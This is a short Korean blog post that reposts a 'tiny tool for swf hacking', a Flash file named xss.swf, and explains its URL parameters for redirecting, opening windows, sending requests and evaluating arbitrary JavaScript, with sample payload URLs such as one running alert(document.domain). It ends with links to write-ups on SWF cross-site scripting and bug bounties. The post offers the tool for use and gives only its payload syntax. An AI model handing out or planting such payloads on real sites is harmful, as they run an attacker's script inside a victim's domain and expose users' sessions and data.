XSS using a Flash SWF



xss.zip


a tiny tool for swf hacking, just browse it:)

param&value:


a(action) - c(cmd)

1.location to url: xss.swf?a=location&c=http://www.google.com/ 

2.open url to new window: xss.swf?a=open&c=http://www.google.com/ 

3.http request to url: xss.swf?a=get&c=http://www.google.com/ 

4.eval js codz: xss.swf?a=eval&c=alert(document.domain)

--------------------------------------------------------------------------------



localhost/xss.swf?a=location&c=http://www.google.com/






※ 출처

https://github.com/evilcos/xss.swf




※ 참고자료

http://panchocosil.blogspot.kr/2013/07/swf-file-preview-at-googlegroupscom.html

http://donncha.is/2013/06/coinbase-owning-a-bitcoin-exchange-bug-bounty-program/

http://erlend.oftedal.no/blog/?blogid=99

http://www.exploit-db.com/

1 ··· 10 11 12 13 14 15 16 17 

카운터

Total : 96,005 / Today : 23 / Yesterday : 27
get rsstistory!